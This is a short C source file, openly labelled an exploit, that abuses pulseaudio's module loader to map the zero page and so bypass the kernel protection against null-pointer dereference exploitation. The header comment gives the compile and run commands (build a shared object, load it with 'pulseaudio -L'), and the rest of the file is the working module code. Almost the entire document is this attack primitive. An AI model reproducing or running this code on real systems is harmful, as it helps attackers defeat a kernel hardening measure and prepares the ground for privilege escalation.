/* bypass null ptr dereference "protection" in mainline kernel
   this is vulnerability #3 (or #4 depending on how you count) in a simple
   feature

   to compile, gcc -shared -o exploit.so pulseaudio_mmapnull.c
   to use, run pulseaudio -L /full/path/to/exploit.so
*/

#include <stdio.h>
#include <sys/mman.h>

int pa__init(void *m)
{
	char *mem;

	mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
	if (mem != 0) {
		fprintf(stderr, "UNABLE TO MAP ZERO PAGE!\n");
		return 1;
	} else
		fprintf(stdout, "MAPPED ZERO PAGE!\n");

	return 0;
}

void pa__done(void *m)
{
	return;
}